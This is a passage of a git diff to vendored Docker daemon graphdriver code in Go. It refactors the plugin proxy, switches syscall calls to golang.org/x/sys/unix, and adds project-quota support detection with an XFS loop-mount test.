 	"github.com/docker/docker/daemon/graphdriver"
@@ -23,17 +22,6 @@ func init() {
 	reexec.Init()
 }
 
-func cdMountFrom(dir, device, target, mType, label string) error {
-	wd, err := os.Getwd()
-	if err != nil {
-		return err
-	}
-	os.Chdir(dir)
-	defer os.Chdir(wd)
-
-	return syscall.Mount(device, target, mType, 0, label)
-}
-
 func skipIfNaive(t *testing.T) {
 	td, err := ioutil.TempDir("", "naive-check-")
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go
index e5ac4ca8c6..68b75a366a 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go
@@ -1,3 +1,3 @@
 // +build !linux
 
-package overlay2
+package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2"
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go
index af5cb659d5..842c06127f 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package overlay2
+package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2"
 
 import (
 	"crypto/rand"
@@ -11,7 +11,8 @@ import (
 	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 // generateID creates a new random string identifier with the given length
@@ -69,7 +70,7 @@ func retryOnError(err error) bool {
 	case *os.PathError:
 		return retryOnError(err.Err) // unpack the target error
 	case syscall.Errno:
-		if err == syscall.EPERM {
+		if err == unix.EPERM {
 			// EPERM represents an entropy pool exhaustion, a condition under
 			// which we backoff and retry.
 			return true
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go
index 67c6640b4b..71f6d2d460 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go
@@ -1,10 +1,11 @@
 // +build linux
 
-package overlayutils
+package overlayutils // import "github.com/docker/docker/daemon/graphdriver/overlayutils"
 
 import (
-	"errors"
 	"fmt"
+
+	"github.com/docker/docker/daemon/graphdriver"
 )
 
 // ErrDTypeNotSupported denotes that the backing filesystem doesn't support d_type.
@@ -13,6 +14,12 @@ func ErrDTypeNotSupported(driver, backingFs string) error {
 	if backingFs == "xfs" {
 		msg += " Reformat the filesystem with ftype=1 to enable d_type support."
 	}
-	msg += " Running without d_type support will no longer be supported in Docker 1.16."
-	return errors.New(msg)
+
+	if backingFs == "extfs" {
+		msg += " Reformat the filesystem (or use tune2fs) with -O filetype flag to enable d_type support."
+	}
+
+	msg += " Backing filesystems without d_type support are not supported."
+
+	return graphdriver.NotSupportedError(msg)
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go
index 7294bcc5f6..b0983c5667 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go
@@ -1,28 +1,21 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 import (
 	"fmt"
-	"io"
 	"path/filepath"
 
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/plugin/v2"
+	"github.com/pkg/errors"
 )
 
-type pluginClient interface {
-	// Call calls the specified method with the specified arguments for the plugin.
-	Call(string, interface{}, interface{}) error
-	// Stream calls the specified method with the specified arguments for the plugin and returns the response IO stream
-	Stream(string, interface{}) (io.ReadCloser, error)
-	// SendFile calls the specified method, and passes through the IO stream
-	SendFile(string, io.Reader, interface{}) error
-}
-
 func lookupPlugin(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) {
 	if !config.ExperimentalEnabled {
 		return nil, fmt.Errorf("graphdriver plugins are only supported with experimental mode")
 	}
-	pl, err := pg.Get(name, "GraphDriver", plugingetter.ACQUIRE)
+	pl, err := pg.Get(name, "GraphDriver", plugingetter.Acquire)
 	if err != nil {
 		return nil, fmt.Errorf("Error looking up graphdriver plugin %s: %v", name, err)
 	}
@@ -33,11 +26,30 @@ func newPluginDriver(name string, pl plugingetter.CompatPlugin, config Options)
 	home := config.Root
 	if !pl.IsV1() {
 		if p, ok := pl.(*v2.Plugin); ok {
-			if p.PropagatedMount != "" {
+			if p.PluginObj.Config.PropagatedMount != "" {
 				home = p.PluginObj.Config.PropagatedMount
 			}
 		}
 	}
-	proxy := &graphDriverProxy{name, pl}
+
+	var proxy *graphDriverProxy
+
+	switch pt := pl.(type) {
+	case plugingetter.PluginWithV1Client:
+		proxy = &graphDriverProxy{name, pl, Capabilities{}, pt.Client()}
+	case plugingetter.PluginAddr:
+		if pt.Protocol() != plugins.ProtocolSchemeHTTPV1 {
+			return nil, errors.Errorf("plugin protocol not supported: %s", pt.Protocol())
+		}
+		addr := pt.Addr()
+		client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pt.Timeout())
+		if err != nil {
+			return nil, errors.Wrap(err, "error creating plugin client")
+		}
+		proxy = &graphDriverProxy{name, pl, Capabilities{}, client}
+	default:
+		return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", pt))
+	}
+
 	return proxy, proxy.Init(filepath.Join(home, name), config.DriverOptions, config.UIDMaps, config.GIDMaps)
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go
index bfe74cc6f9..cb350d8074 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go
@@ -1,19 +1,22 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 import (
 	"errors"
 	"fmt"
 	"io"
-	"path/filepath"
 
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
 )
 
 type graphDriverProxy struct {
-	name string
-	p    plugingetter.CompatPlugin
+	name   string
+	p      plugingetter.CompatPlugin
+	caps   Capabilities
+	client *plugins.Client
 }
 
 type graphDriverRequest struct {
@@ -24,13 +27,14 @@ type graphDriverRequest struct {
 }
 
 type graphDriverResponse struct {
-	Err      string            `json:",omitempty"`
-	Dir      string            `json:",omitempty"`
-	Exists   bool              `json:",omitempty"`
-	Status   [][2]string       `json:",omitempty"`
-	Changes  []archive.Change  `json:",omitempty"`
-	Size     int64             `json:",omitempty"`
-	Metadata map[string]string `json:",omitempty"`
+	Err          string            `json:",omitempty"`
+	Dir          string            `json:",omitempty"`
+	Exists       bool              `json:",omitempty"`
+	Status       [][2]string       `json:",omitempty"`
+	Changes      []archive.Change  `json:",omitempty"`
+	Size         int64             `json:",omitempty"`
+	Metadata     map[string]string `json:",omitempty"`
+	Capabilities Capabilities      `json:",omitempty"`
 }
 
 type graphDriverInitRequest struct {
@@ -54,40 +58,48 @@ func (d *graphDriverProxy) Init(home string, opts []string, uidMaps, gidMaps []i
 		GIDMaps: gidMaps,
 	}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Init", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Init", args, &ret); err != nil {
 		return err
 	}
 	if ret.Err != "" {
 		return errors.New(ret.Err)
 	}
+	caps, err := d.fetchCaps()
+	if err != nil {
+		return err
+	}
+	d.caps = caps
 	return nil
 }
 
+func (d *graphDriverProxy) fetchCaps() (Capabilities, error) {
+	args := &graphDriverRequest{}
+	var ret graphDriverResponse
+	if err := d.client.Call("GraphDriver.Capabilities", args, &ret); err != nil {
+		if !plugins.IsNotFound(err) {
+			return Capabilities{}, err
+		}
+	}
+	return ret.Capabilities, nil
+}
+
 func (d *graphDriverProxy) String() string {
 	return d.name
 }
 
-func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error {
-	args := &graphDriverRequest{
-		ID:     id,
-		Parent: parent,
-	}
-	if opts != nil {
-		args.MountLabel = opts.MountLabel
-		args.StorageOpt = opts.StorageOpt
-	}
+func (d *graphDriverProxy) Capabilities() Capabilities {
+	return d.caps
+}
 
-	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.CreateReadWrite", args, &ret); err != nil {
-		return err
-	}
-	if ret.Err != "" {
-		return errors.New(ret.Err)
-	}
-	return nil
+func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error {
+	return d.create("GraphDriver.CreateReadWrite", id, parent, opts)
 }
 
 func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error {
+	return d.create("GraphDriver.Create", id, parent, opts)
+}
+
+func (d *graphDriverProxy) create(method, id, parent string, opts *CreateOpts) error {
 	args := &graphDriverRequest{
 		ID:     id,
 		Parent: parent,
@@ -97,7 +109,7 @@ func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error {
 		args.StorageOpt = opts.StorageOpt
 	}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Create", args, &ret); err != nil {
+	if err := d.client.Call(method, args, &ret); err != nil {
 		return err
 	}
 	if ret.Err != "" {
@@ -109,7 +121,7 @@ func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error {
 func (d *graphDriverProxy) Remove(id string) error {
 	args := &graphDriverRequest{ID: id}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Remove", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Remove", args, &ret); err != nil {
 		return err
 	}
 	if ret.Err != "" {
@@ -118,26 +130,26 @@ func (d *graphDriverProxy) Remove(id string) error {
 	return nil
 }
 
-func (d *graphDriverProxy) Get(id, mountLabel string) (string, error) {
+func (d *graphDriverProxy) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
 	args := &graphDriverRequest{
 		ID:         id,
 		MountLabel: mountLabel,
 	}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Get", args, &ret); err != nil {
-		return "", err
+	if err := d.client.Call("GraphDriver.Get", args, &ret); err != nil {
+		return nil, err
 	}
 	var err error
 	if ret.Err != "" {
 		err = errors.New(ret.Err)
 	}
-	return filepath.Join(d.p.BasePath(), ret.Dir), err
+	return containerfs.NewLocalContainerFS(d.p.ScopedPath(ret.Dir)), err
 }
 
 func (d *graphDriverProxy) Put(id string) error {
 	args := &graphDriverRequest{ID: id}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Put", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Put", args, &ret); err != nil {
 		return err
 	}
 	if ret.Err != "" {
@@ -149,7 +161,7 @@ func (d *graphDriverProxy) Put(id string) error {
 func (d *graphDriverProxy) Exists(id string) bool {
 	args := &graphDriverRequest{ID: id}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Exists", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Exists", args, &ret); err != nil {
 		return false
 	}
 	return ret.Exists
@@ -158,7 +170,7 @@ func (d *graphDriverProxy) Exists(id string) bool {
 func (d *graphDriverProxy) Status() [][2]string {
 	args := &graphDriverRequest{}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Status", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Status", args, &ret); err != nil {
 		return nil
 	}
 	return ret.Status
@@ -169,7 +181,7 @@ func (d *graphDriverProxy) GetMetadata(id string) (map[string]string, error) {
 		ID: id,
 	}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.GetMetadata", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.GetMetadata", args, &ret); err != nil {
 		return nil, err
 	}
 	if ret.Err != "" {
@@ -188,7 +200,7 @@ func (d *graphDriverProxy) Cleanup() error {
 
 	args := &graphDriverRequest{}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Cleanup", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Cleanup", args, &ret); err != nil {
 		return nil
 	}
 	if ret.Err != "" {
@@ -202,7 +214,7 @@ func (d *graphDriverProxy) Diff(id, parent string) (io.ReadCloser, error) {
 		ID:     id,
 		Parent: parent,
 	}
-	body, err := d.p.Client().Stream("GraphDriver.Diff", args)
+	body, err := d.client.Stream("GraphDriver.Diff", args)
 	if err != nil {
 		return nil, err
 	}
@@ -215,7 +227,7 @@ func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error)
 		Parent: parent,
 	}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.Changes", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.Changes", args, &ret); err != nil {
 		return nil, err
 	}
 	if ret.Err != "" {
@@ -227,7 +239,7 @@ func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error)
 
 func (d *graphDriverProxy) ApplyDiff(id, parent string, diff io.Reader) (int64, error) {
 	var ret graphDriverResponse
-	if err := d.p.Client().SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil {
+	if err := d.client.SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil {
 		return -1, err
 	}
 	if ret.Err != "" {
@@ -242,7 +254,7 @@ func (d *graphDriverProxy) DiffSize(id, parent string) (int64, error) {
 		Parent: parent,
 	}
 	var ret graphDriverResponse
-	if err := d.p.Client().Call("GraphDriver.DiffSize", args, &ret); err != nil {
+	if err := d.client.Call("GraphDriver.DiffSize", args, &ret); err != nil {
 		return -1, err
 	}
 	if ret.Err != "" {
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go
new file mode 100644
index 0000000000..68e797470d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go
@@ -0,0 +1,19 @@
+package quota // import "github.com/docker/docker/daemon/graphdriver/quota"
+
+import "github.com/docker/docker/errdefs"
+
+var (
+	_ errdefs.ErrNotImplemented = (*errQuotaNotSupported)(nil)
+)
+
+// ErrQuotaNotSupported indicates if were found the FS didn't have projects quotas available
+var ErrQuotaNotSupported = errQuotaNotSupported{}
+
+type errQuotaNotSupported struct {
+}
+
+func (e errQuotaNotSupported) NotImplemented() {}
+
+func (e errQuotaNotSupported) Error() string {
+	return "Filesystem does not support, or has not enabled quotas"
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go
index e408d5f906..93e85823af 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go
@@ -9,7 +9,7 @@
 //       for both xfs/ext4 for kernel version >= v4.5
 //
 
-package quota
+package quota // import "github.com/docker/docker/daemon/graphdriver/quota"
 
 /*
 #include <stdlib.h>
@@ -47,18 +47,20 @@ struct fsxattr {
 #ifndef Q_XGETPQUOTA
 #define Q_XGETPQUOTA QCMD(Q_XGETQUOTA, PRJQUOTA)
 #endif
+
+const int Q_XGETQSTAT_PRJQUOTA = QCMD(Q_XGETQSTAT, PRJQUOTA);
 */
 import "C"
 import (
 	"fmt"
 	"io/ioutil"
-	"os"
 	"path"
 	"path/filepath"
-	"syscall"
 	"unsafe"
 
-	"github.com/Sirupsen/logrus"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 // Quota limit params - currently we only control blocks hard limit
@@ -98,13 +100,12 @@ type Control struct {
 //
 func NewControl(basePath string) (*Control, error) {
 	//
-	// Get project id of parent dir as minimal id to be used by driver
+	// If we are running in a user namespace quota won't be supported for
+	// now since makeBackingFsDev() will try to mknod().
 	//
-	minProjectID, err := getProjectID(basePath)
-	if err != nil {
-		return nil, err
+	if rsystem.RunningInUserNS() {
+		return nil, ErrQuotaNotSupported
 	}
-	minProjectID++
 
 	//
 	// create backing filesystem device node
@@ -114,6 +115,25 @@ func NewControl(basePath string) (*Control, error) {
 		return nil, err
 	}
 
+	// check if we can call quotactl with project quotas
+	// as a mechanism to determine (early) if we have support
+	hasQuotaSupport, err := hasQuotaSupport(backingFsBlockDev)
+	if err != nil {
+		return nil, err
+	}
+	if !hasQuotaSupport {
+		return nil, ErrQuotaNotSupported
+	}
+
+	//
+	// Get project id of parent dir as minimal id to be used by driver
+	//
+	minProjectID, err := getProjectID(basePath)
+	if err != nil {
+		return nil, err
+	}
+	minProjectID++
+
 	//
 	// Test if filesystem supports project quotas by trying to set
 	// a quota on the first available project id
@@ -184,7 +204,7 @@ func setProjectQuota(backingFsBlockDev string, projectID uint32, quota Quota) er
 	var cs = C.CString(backingFsBlockDev)
 	defer C.free(unsafe.Pointer(cs))
 
-	_, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XSETPQLIM,
+	_, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, C.Q_XSETPQLIM,
 		uintptr(unsafe.Pointer(cs)), uintptr(d.d_id),
 		uintptr(unsafe.Pointer(&d)), 0, 0)
 	if errno != 0 {
@@ -211,7 +231,7 @@ func (q *Control) GetQuota(targetPath string, quota *Quota) error {
 	var cs = C.CString(q.backingFsBlockDev)
 	defer C.free(unsafe.Pointer(cs))
 
-	_, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XGETPQUOTA,
+	_, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, C.Q_XGETPQUOTA,
 		uintptr(unsafe.Pointer(cs)), uintptr(C.__u32(projectID)),
 		uintptr(unsafe.Pointer(&d)), 0, 0)
 	if errno != 0 {
@@ -232,7 +252,7 @@ func getProjectID(targetPath string) (uint32, error) {
 	defer closeDir(dir)
 
 	var fsx C.struct_fsxattr
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR,
 		uintptr(unsafe.Pointer(&fsx)))
 	if errno != 0 {
 		return 0, fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error())
@@ -250,14 +270,14 @@ func setProjectID(targetPath string, projectID uint32) error {
 	defer closeDir(dir)
 
 	var fsx C.struct_fsxattr
-	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR,
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR,
 		uintptr(unsafe.Pointer(&fsx)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error())
 	}
 	fsx.fsx_projid = C.__u32(projectID)
 	fsx.fsx_xflags |= C.FS_XFLAG_PROJINHERIT
-	_, _, errno = syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR,
+	_, _, errno = unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR,
 		uintptr(unsafe.Pointer(&fsx)))
 	if errno != 0 {
 		return fmt.Errorf("Failed to set projid for %s: %v", targetPath, errno.Error())
@@ -322,18 +342,43 @@ func getDirFd(dir *C.DIR) uintptr {
 // and create a block device node under the home directory
 // to be used by quotactl commands
 func makeBackingFsDev(home string) (string, error) {
-	fileinfo, err := os.Stat(home)
-	if err != nil {
+	var stat unix.Stat_t
+	if err := unix.Stat(home, &stat); err != nil {
 		return "", err
 	}
 
 	backingFsBlockDev := path.Join(home, "backingFsBlockDev")
-	// Re-create just in case comeone copied the home directory over to a new device
-	syscall.Unlink(backingFsBlockDev)
-	stat := fileinfo.Sys().(*syscall.Stat_t)
-	if err := syscall.Mknod(backingFsBlockDev, syscall.S_IFBLK|0600, int(stat.Dev)); err != nil {
+	// Re-create just in case someone copied the home directory over to a new device
+	unix.Unlink(backingFsBlockDev)
+	err := unix.Mknod(backingFsBlockDev, unix.S_IFBLK|0600, int(stat.Dev))
+	switch err {
+	case nil:
+		return backingFsBlockDev, nil
+
+	case unix.ENOSYS:
+		return "", ErrQuotaNotSupported
+
+	default:
 		return "", fmt.Errorf("Failed to mknod %s: %v", backingFsBlockDev, err)
 	}
+}
+
+func hasQuotaSupport(backingFsBlockDev string) (bool, error) {
+	var cs = C.CString(backingFsBlockDev)
+	defer free(cs)
+	var qstat C.fs_quota_stat_t
+
+	_, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, uintptr(C.Q_XGETQSTAT_PRJQUOTA), uintptr(unsafe.Pointer(cs)), 0, uintptr(unsafe.Pointer(&qstat)), 0, 0)
+	if errno == 0 && qstat.qs_flags&C.FS_QUOTA_PDQ_ENFD > 0 && qstat.qs_flags&C.FS_QUOTA_PDQ_ACCT > 0 {
+		return true, nil
+	}
+
+	switch errno {
+	// These are the known fatal errors, consider all other errors (ENOTTY, etc.. not supporting quota)
+	case unix.EFAULT, unix.ENOENT, unix.ENOTBLK, unix.EPERM:
+	default:
+		return false, nil
+	}
 
-	return backingFsBlockDev, nil
+	return false, errno
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go
new file mode 100644
index 0000000000..aa164cc419
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go
@@ -0,0 +1,152 @@
+// +build linux
+
+package quota // import "github.com/docker/docker/daemon/graphdriver/quota"
+
+import (
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"testing"
+
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+)
+
+// 10MB
+const testQuotaSize = 10 * 1024 * 1024
+const imageSize = 64 * 1024 * 1024
+
+func TestBlockDev(t *testing.T) {
+	mkfs, err := exec.LookPath("mkfs.xfs")
+	if err != nil {
+		t.Skip("mkfs.xfs not found in PATH")
+	}
+
+	// create a sparse image
+	imageFile, err := ioutil.TempFile("", "xfs-image")
+	if err != nil {
+		t.Fatal(err)
+	}
+	imageFileName := imageFile.Name()
+	defer os.Remove(imageFileName)
+	if _, err = imageFile.Seek(imageSize-1, 0); err != nil {
+		t.Fatal(err)
+	}
+	if _, err = imageFile.Write([]byte{0}); err != nil {
+		t.Fatal(err)
+	}
+	if err = imageFile.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	// The reason for disabling these options is sometimes people run with a newer userspace
+	// than kernelspace
+	out, err := exec.Command(mkfs, "-m", "crc=0,finobt=0", imageFileName).CombinedOutput()
+	if len(out) > 0 {
+		t.Log(string(out))
+	}
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	t.Run("testBlockDevQuotaDisabled", wrapMountTest(imageFileName, false, testBlockDevQuotaDisabled))
+	t.Run("testBlockDevQuotaEnabled", wrapMountTest(imageFileName, true, testBlockDevQuotaEnabled))
+	t.Run("testSmallerThanQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testSmallerThanQuota)))
+	t.Run("testBiggerThanQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testBiggerThanQuota)))
+	t.Run("testRetrieveQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testRetrieveQuota)))
+}
+
+func wrapMountTest(imageFileName string, enableQuota bool, testFunc func(t *testing.T, mountPoint, backingFsDev string)) func(*testing.T) {
+	return func(t *testing.T) {
+		mountOptions := "loop"
+
+		if enableQuota {
+			mountOptions = mountOptions + ",prjquota"
+		}
+
+		mountPointDir := fs.NewDir(t, "xfs-mountPoint")
+		defer mountPointDir.Remove()
+		mountPoint := mountPointDir.Path()
+
+		out, err := exec.Command("mount", "-o", mountOptions, imageFileName, mountPoint).CombinedOutput()
+		if err != nil {
+			_, err := os.Stat("/proc/fs/xfs")
+			if os.IsNotExist(err) {
+				t.Skip("no /proc/fs/xfs")
+			}
+		}
+
+		assert.NilError(t, err, "mount failed: %s", out)
+
+		defer func() {
+			assert.NilError(t, unix.Unmount(mountPoint, 0))
+		}()
+
+		backingFsDev, err := makeBackingFsDev(mountPoint)
+		assert.NilError(t, err)
+
+		testFunc(t, mountPoint, backingFsDev)
+	}
+}
+
+func testBlockDevQuotaDisabled(t *testing.T, mountPoint, backingFsDev string) {
+	hasSupport, err := hasQuotaSupport(backingFsDev)
+	assert.NilError(t, err)
+	assert.Check(t, !hasSupport)
+}
+
+func testBlockDevQuotaEnabled(t *testing.T, mountPoint, backingFsDev string) {
+	hasSupport, err := hasQuotaSupport(backingFsDev)
+	assert.NilError(t, err)
+	assert.Check(t, hasSupport)
+}
+
+func wrapQuotaTest(testFunc func(t *testing.T, ctrl *Control, mountPoint, testDir, testSubDir string)) func(t *testing.T, mountPoint, backingFsDev string) {
+	return func(t *testing.T, mountPoint, backingFsDev string) {
+		testDir, err := ioutil.TempDir(mountPoint, "per-test")
+		assert.NilError(t, err)
+		defer os.RemoveAll(testDir)
+
+		ctrl, err := NewControl(testDir)
+		assert.NilError(t, err)
+
+		testSubDir, err := ioutil.TempDir(testDir, "quota-test")
+		assert.NilError(t, err)
+		testFunc(t, ctrl, mountPoint, testDir, testSubDir)
+	}
+
+}
+
+func testSmallerThanQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) {
+	assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize}))
+	smallerThanQuotaFile := filepath.Join(testSubDir, "smaller-than-quota")
+	assert.NilError(t, ioutil.WriteFile(smallerThanQuotaFile, make([]byte, testQuotaSize/2), 0644))
+	assert.NilError(t, os.Remove(smallerThanQuotaFile))
+}
+
+func testBiggerThanQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) {
+	// Make sure the quota is being enforced
+	// TODO: When we implement this under EXT4, we need to shed CAP_SYS_RESOURCE, otherwise
+	// we're able to violate quota without issue
+	assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize}))
+
+	biggerThanQuotaFile := filepath.Join(testSubDir, "bigger-than-quota")
+	err := ioutil.WriteFile(biggerThanQuotaFile, make([]byte, testQuotaSize+1), 0644)
+	assert.Assert(t, is.ErrorContains(err, ""))
+	if err == io.ErrShortWrite {
+		assert.NilError(t, os.Remove(biggerThanQuotaFile))
+	}
+}
+
+func testRetrieveQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) {
+	// Validate that we can retrieve quota
+	assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize}))
+
+	var q Quota
+	assert.NilError(t, ctrl.GetQuota(testSubDir, &q))
+	assert.Check(t, is.Equal(uint64(testQuotaSize), q.Size))
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go
index 262954d6e3..ec18d1d377 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go
@@ -1,6 +1,6 @@
 // +build !exclude_graphdriver_aufs,linux
 
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
 	// register the aufs graphdriver
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go
index f456cc5ce5..2f8c67056b 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go
@@ -1,6 +1,6 @@
 // +build !exclude_graphdriver_btrfs,linux
 
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
 	// register the btrfs graphdriver
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go
index bb2e9ef541..ccbb8bfabe 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go
@@ -1,6 +1,6 @@
-// +build !exclude_graphdriver_devicemapper,linux
+// +build !exclude_graphdriver_devicemapper,!static_build,linux
 
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
 	// register the devmapper graphdriver
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go
index 9ba849cedc..a2e384d548 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go
@@ -1,9 +1,8 @@
 // +build !exclude_graphdriver_overlay,linux
 
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
 	// register the overlay graphdriver
 	_ "github.com/docker/docker/daemon/graphdriver/overlay"
